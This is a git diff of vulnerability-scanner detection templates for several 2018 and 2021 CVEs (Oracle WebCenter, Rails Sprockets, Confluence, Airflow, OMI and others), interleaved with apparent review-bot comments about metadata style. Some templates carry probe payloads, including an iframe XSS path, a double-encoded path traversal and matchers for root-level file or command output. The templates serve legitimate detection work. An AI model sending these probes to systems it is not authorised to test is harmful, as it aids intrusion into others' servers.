@@ -1,19 +1,20 @@ id: CVE-2018-3238 info: - name: Multiple XSS Oracle WebCenter Sites + name: Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting author: leovalcante severity: medium - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. + description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + - https://www.oracle.com/security-alerts/cpuoct2018.html - https://nvd.nist.gov/vuln/detail/CVE-2018-3238 - tags: cve,cve2018,oracle,wcs,xss + - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N - cvss-score: 6.90 + cvss-score: 6.9 cve-id: CVE-2018-3238 - + tags: cve,cve2018,oracle,wcs,xss requests: - raw: @@ -42,4 +43,6 @@ requests: words: - '' - 'Variables.cs_imagedir' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml index e44ca7a0b5..50093afd70 100644 --- a/cves/2018/CVE-2018-3714.yaml +++ b/cves/2018/CVE-2018-3714.yaml 
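Review bot: The two added `reference` entries `https://www.oracle.com/security-alerts/cpuoct2018.html` and `http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html` appear to point at the same October 2018 Critical Patch Update under the new and the legacy URL scheme; keeping only the current `security-alerts` URL avoids a duplicate that later reference clean-ups will flag. The rewritten `description` matches the `PR:H` vector ("high privileged attackers"), which is good. The second hunk of this file only fixes the trailing newline.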
@@ -1,16 +1,18 @@ id: CVE-2018-3714 + info: name: node-srv Path Traversal author: madrobot severity: medium - reference: https://hackerone.com/reports/309124 - tags: cve,cve2018,nodejs,lfi + description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path. + reference: + - https://hackerone.com/reports/309124 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2018-3714 cwe-id: CWE-22 - description: "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path." + tags: cve,cve2018,nodejs,lfi requests: - method: GET diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 221891cb15..d4508b7285 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml 
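Review bot: The single-entry `reference` list on the new `+ - https://hackerone.com/reports/309124` line omits the NVD entry that the other templates in this commit add alongside their primary source; for consistency add `- https://nvd.nist.gov/vuln/detail/CVE-2018-3714`, the URL shape used in the sibling files. The `requests` block is outside this hunk.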
@@ -4,20 +4,20 @@ info: name: Ruby On Rails Path Traversal author: 0xrudra,pikpikcu severity: high + description: | + Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. + There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. reference: - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - https://seclists.org/oss-sec/2018/q2/210 - https://xz.aliyun.com/t/2542 - description: | - Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. - There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. - tags: cve,cve2018,rails,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-3760 cwe-id: CWE-200 + tags: cve,cve2018,rails,lfi,ruby requests: - raw: @@ -41,7 +41,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index d7c71edf22..0527d91a3c 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml 
@@ -1,17 +1,21 @@ id: CVE-2018-3810 info: - name: WordPress Smart Google Code Inserter Authentication Bypass + name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass author: princechaddha severity: critical - reference: https://www.exploit-db.com/exploits/43420 - tags: wordpress,cve,cve2018 + description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. + reference: + - https://www.exploit-db.com/exploits/43420 + - https://nvd.nist.gov/vuln/detail/CVE-2018-3810 + - https://wordpress.org/plugins/smart-google-code-inserter/#developers + - https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-3810 cwe-id: CWE-287 - description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code." + tags: wordpress,cve,cve2018,google requests: - method: POST @@ -40,4 +44,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-5230.yaml b/cves/2018/CVE-2018-5230.yaml index 3073e580b5..ec997e4f28 100644 --- a/cves/2018/CVE-2018-5230.yaml 
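Review bot: The rewritten `tags` line (`tags: wordpress,cve,cve2018,google`) drops the `wp-plugin` tag that the other WordPress plugin templates in this commit carry (for example `lfi,wp,wordpress,wp-plugin,...` in CVE-2021-39312), so this template will be missed by tag-based runs that select plugin checks; `google` is neither a product nor a vulnerability-class tag. Suggest `tags: cve,cve2018,wordpress,wp-plugin` and, if a vendor tag is wanted, `oturia`. The `requests` block continues outside this hunk.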
+++ b/cves/2018/CVE-2018-5230.yaml @@ -4,26 +4,38 @@ info: name: Atlassian Confluence Status-List XSS author: madrobot severity: medium - tags: cve,cve2018,atlassian,confluence,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-5230 - cwe-id: CWE-79 - description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified." + description: | + The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified. reference: - https://jira.atlassian.com/browse/JRASERVER-67289 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-5230 + cwe-id: CWE-79 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2018,atlassian,confluence,xss requests: - method: GET path: - - "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm" + - "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm" + matchers-condition: and matchers: - type: status status: - 200 + - type: word - words: - - "SRC=\"javascript:alert(1337)\">" part: body + words: + - '" + - "adsf/js/" + condition: and \ No newline at end of file diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index c7327b670e..39ca5a1721 100644 
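Review bot: The `description` block scalar that this hunk moves and keeps (`The issue collector in Atlassian Jira before version 7.6.6 ...`) describes a Jira issue-collector XSS, while the template `name` (`Atlassian Confluence Status-List XSS`), the request path (`/pages/includes/status-list-mo...`) and the newly added `shodan-query: http.component:"Atlassian Confluence"` are all about Confluence, so one of them is attached to the wrong CVE. The description should be re-checked against the JRASERVER-67289 link and the NVD entry for CVE-2018-5230 and rewritten to match the Confluence status-list template, or the whole template re-pointed. The new `words` entries of the body matcher are not legible in this view, so the matcher change itself is not reviewed here.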
--- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -1,19 +1,20 @@ id: CVE-2021-37538 info: - name: PrestaShop SmartBlog SQL Injection + name: PrestaShop SmartBlog <4.0.6- SQL Injection author: whoever severity: critical - description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. - tags: cve,cve2021,prestashop,smartblog,sqli + description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-37538 + - https://classydevs.com/free-modules/smartblog/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-37538 cwe-id: CWE-89 + tags: cve,cve2021,prestashop,smartblog,sqli requests: - method: GET @@ -30,3 +31,5 @@ requests: words: - "c5fe25896e49ddfe996db7508cf00534" part: body + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index aa50dba941..6d291320a1 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml 
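Review bot: The new `name` line `PrestaShop SmartBlog <4.0.6- SQL Injection` is missing the space before the dash that the other renamed templates in this commit use (`... - Authentication Bypass`, `... - Remote Code Execution`); it should read `name: PrestaShop SmartBlog <4.0.6 - SQL Injection`. The rewritten `description` also says "vulnerable to a SQL injection vulnerability"; `description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is susceptible to SQL injection in the blog archive functionality.` avoids the repetition. The `requests` block is outside this hunk.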
@@ -1,18 +1,21 @@ id: CVE-2021-37573 info: - name: Tiny Java Web Server - Reflected XSS + name: Tiny Java Web Server - Reflected Cross-Site Scripting author: geeknik severity: medium + description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page. reference: - https://seclists.org/fulldisclosure/2021/Aug/13 - tags: cve,cve2021,xss,tjws + - https://nvd.nist.gov/vuln/detail/CVE-2021-37573 + - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt + - http://seclists.org/fulldisclosure/2021/Aug/13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-37573 cwe-id: CWE-79 - description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" + tags: cve,cve2021,xss,tjws,java requests: - method: GET @@ -34,3 +37,5 @@ requests: part: header words: - text/html + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2021/CVE-2021-37580.yaml b/cves/2021/CVE-2021-37580.yaml index ec923d692f..93830671c7 100644 --- a/cves/2021/CVE-2021-37580.yaml +++ b/cves/2021/CVE-2021-37580.yaml 
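Review bot: The added `reference` entry `http://seclists.org/fulldisclosure/2021/Aug/13` duplicates the existing `https://seclists.org/fulldisclosure/2021/Aug/13` entry two lines above it, differing only in scheme; drop the `http` copy. The new `description` also carries "TTiny Java Web Server" over from the removed line, which looks like a doubled letter for "Tiny Java Web Server", the expansion of TJWS used in the `name`. The `requests` block is outside this hunk.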
@@ -1,19 +1,21 @@ id: CVE-2021-37580 info: - name: Apache ShenYu Admin JWT authentication bypass + name: Apache ShenYu Admin JWT - Authentication Bypass author: pdteam severity: critical - description: A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0 + description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-37580 - https://github.com/fengwenhua/CVE-2021-37580 - tags: cve,cve2021,apache,jwt,shenyu + - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb + - http://www.openwall.com/lists/oss-security/2021/11/16/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 + tags: cve,cve2021,apache,jwt,shenyu requests: - raw: @@ -33,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index cefb540971..b5147f128a 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml 
@@ -1,19 +1,21 @@ id: CVE-2021-37704 info: - name: phpfastcache phpinfo exposure + name: phpinfo Resource Exposure author: whoever severity: medium - description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. - tags: cve,cve2021,exposure,phpfastcache + description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. reference: - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc + - https://packagist.org/packages/phpfastcache/phpfastcache + - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2021-37704 cwe-id: CWE-668 + tags: cve,cve2021,exposure,phpfastcache,phpinfo requests: - method: GET @@ -39,3 +41,5 @@ requests: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index 74f7def049..f76398eeb8 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -8,12 +8,13 @@ info: reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 - tags: cve,cve2021,hoteldruid,xss + - https://www.hoteldruid.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-37833 cwe-id: CWE-79 + tags: cve,cve2021,hoteldruid,xss requests: - method: GET diff --git a/cves/2021/CVE-2021-38314.yaml b/cves/2021/CVE-2021-38314.yaml index bb427aec4f..9f1a2d8b75 100644 --- a/cves/2021/CVE-2021-38314.yaml 
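Review bot: The added `reference` item `- https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704` concatenates two URLs into one list entry, and the first of them already appears as its own entry on the line above; split it so the list holds `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704` on its own line and delete the duplicate. The rename to `name: phpinfo Resource Exposure` also drops the affected product, which every other `name` in this commit keeps; `name: phpfastcache - phpinfo Resource Exposure` keeps it searchable. The `requests` block is outside this hunk.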
+++ b/cves/2021/CVE-2021-38314.yaml 
@@ -4,16 +4,19 @@ info: name: Redux Framework - Unauthenticated Sensitive Information Disclosure author: meme-lord severity: medium + description: The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` + that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known + salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the + `SECURE_AUTH_KEY`. reference: - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c - https://blog.sorcery.ie/posts/redux_wordpress/ - tags: cve,cve2021,wordpress,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2021-38314 - description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." + tags: cve,cve2021,wordpress,wp-plugin requests: - raw: 
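Review bot: The new `description` is a plain scalar continued over four physical lines (`description: The Gutenberg ...`, `that were unique ...`, `salt value ...`, `` `SECURE_AUTH_KEY`. ``), which YAML folds into one string only because each continuation happens to be indented more than the key; that is the accidental-multi-line-scalar shape, and a stray blank line or a less indented continuation would silently truncate or break the field. The other multi-paragraph descriptions in this commit (CVE-2018-3760, CVE-2018-5230) use a block scalar; `description: |` (or `>-` for a single folded line) with the text indented beneath it is the robust form. The `requests` block starts at the end of this hunk and continues outside it.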
diff --git a/cves/2021/CVE-2021-38540.yaml b/cves/2021/CVE-2021-38540.yaml index 95f9b1bee7..58293f9952 100644 --- a/cves/2021/CVE-2021-38540.yaml +++ b/cves/2021/CVE-2021-38540.yaml @@ -4,16 +4,21 @@ info: name: Apache Airflow - Unauthenticated Variable Import author: pdteam severity: critical - description: The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3. - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-38540 - tags: cve,cve2021,apache,airflow,rce - metadata: - shodan-query: title:"Sign In - Airflow" + description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38540 + - https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E + - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E + remediation: Upgrade to Apache Airflow 2.1.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-38540 cwe-id: CWE-306 + metadata: + shodan-query: title:"Sign In - Airflow" + verified: true + tags: cve,cve2021,apache,airflow,rce requests: - raw: @@ -64,4 +69,7 @@ requests: - type: word words: - - 'You should be redirected automatically to target URL:
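Review bot: The rewritten `description` line begins `Apache Airflow Airflow >=2.0.0 and <2.1.3 ...`, a doubled product name. `description: Apache Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint, which allows unauthenticated users to add or modify Airflow variables used in DAGs, potentially resulting in denial of service, information disclosure or remote code execution.` reads cleanly and keeps the facts of the removed line. The added `verified: true` under `metadata` is a key not present in any other template touched by this commit; fine if it is the convention the repository has adopted, otherwise it should be dropped. The `requests` block starts at the end of this hunk and continues outside it.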
' \ No newline at end of file + - 'You should be redirected automatically to target URL: ' + + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index ed29c6ae66..c9b6cc9183 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -1,21 +1,22 @@ id: CVE-2021-38647 info: - name: OMIGOD - Open Management Infrastructure RCE + name: Microsoft Open Management Infrastructure - Remote Code Execution author: daffainfo,xstp severity: critical - tags: cve,cve2021,rce,omi,microsoft - description: Open Management Infrastructure Remote Code Execution Vulnerability + description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi + remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-38647 + tags: cve,cve2021,rce,omi,microsoft requests: - raw: @@ -65,4 +66,6 @@ requests: words: - '' - 'uid=0(root) gid=0(root) groups=0' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index cf51a9d3b3..4c1fde131c 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml 
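Review bot: The added `remediation` line `Updates for this vulnerability were published on GitHub on August 11, 2021.` states when a fix appeared but not what to install, so a reader still has to follow the `microsoft/omi` reference to learn the fixed release; the other `remediation` lines in this commit name a version (`Upgrade to Apache Airflow 2.1.3 or higher.`, `Fixed in version 2.2.4`). Suggest `remediation: Upgrade OMI to the fixed release published on GitHub on August 11, 2021 (version <FIXED-VERSION>, see the microsoft/omi reference).` with the version filled in from the advisory. The `requests` block is outside this hunk.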
@@ -1,17 +1,20 @@ id: CVE-2021-38702 info: - name: Cyberoam NetGenie XSS + name: Cyberoam NetGenie Cross-Site Scripting author: geeknik severity: medium - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. - reference: https://seclists.org/fulldisclosure/2021/Aug/20 - tags: cve,cve2021,cyberoam,netgenie,xss,router + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + reference: + - https://seclists.org/fulldisclosure/2021/Aug/20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 + - http://www.cyberoamworks.com/NetGenie-Home.asp classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 + tags: cve,cve2021,cyberoam,netgenie,xss,router requests: - method: GET @@ -32,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs on 2022/04/01 diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml index 9f4942c70c..cfe5058168 100644 --- a/cves/2021/CVE-2021-38704.yaml +++ b/cves/2021/CVE-2021-38704.yaml 
@@ -1,21 +1,22 @@ id: CVE-2021-38704 info: - name: ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS) + name: ClinicCases 7.3.3 Reflected Cross-Site Scripting author: alph4byt3 severity: medium - description: Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. + description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 + - https://github.com/judsonmitchell/ClinicCases/releases + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-38704 + cwe-id: CWE-79 metadata: shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-38704 - cwe-id: CWE-79 requests: - method: GET @@ -37,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/28 diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index f65c7095ad..84b24e75e3 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml 
@@ -4,20 +4,18 @@ info: name: ExponentCMS <= 2.6 Host Header Injection author: dwisiswant0 severity: medium - description: | - A HTTP Host header attack exists in ExponentCMS 2.6 - and below in /exponent_constants.php. A modified HTTP - header can change links on the webpage to an arbitrary value, - leading to a possible attack vector for MITM. + description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack + vector for MITM. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 - tags: cve,cve2021,exponentcms classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2021-38751 cwe-id: CWE-116 + tags: cve,cve2021,exponentcms requests: - method: GET @@ -39,4 +37,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39226.yaml b/cves/2021/CVE-2021-39226.yaml index 70e9dda091..45283779fc 100644 --- a/cves/2021/CVE-2021-39226.yaml +++ b/cves/2021/CVE-2021-39226.yaml 
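Review bot: The rewritten `description` loses a space in `arbitrary value,leading to a possible attack` and, by replacing the `description: |` block scalar with a plain scalar that wraps onto a second physical line (`+ vector for MITM.`), trades an explicit multi-line form for one that only parses because the continuation is indented. Keep the block scalar and fix the punctuation: `description: |` followed by the text with `arbitrary value, leading to a possible attack vector for MITM.`, or use `>-` if a folded single line is wanted. The `requests` block is outside this hunk.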
@@ -1,19 +1,22 @@ id: CVE-2021-39226 info: - name: Grafana Snapshot authentication bypass + name: Grafana Snapshot - Authentication Bypass author: Evan Rubinstein - description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accesing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accesing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can delete snapshots by accesing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snappshot/:key, regardless of wether or not the snapshot is set to public mode (disabled by default). Make sure you obtain permission before testing the delete functionality, as this can cause a denial of service. As always, ensure that you test your results manually to ensure your findings are good. Happy Hunting! + severity: high + description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). 
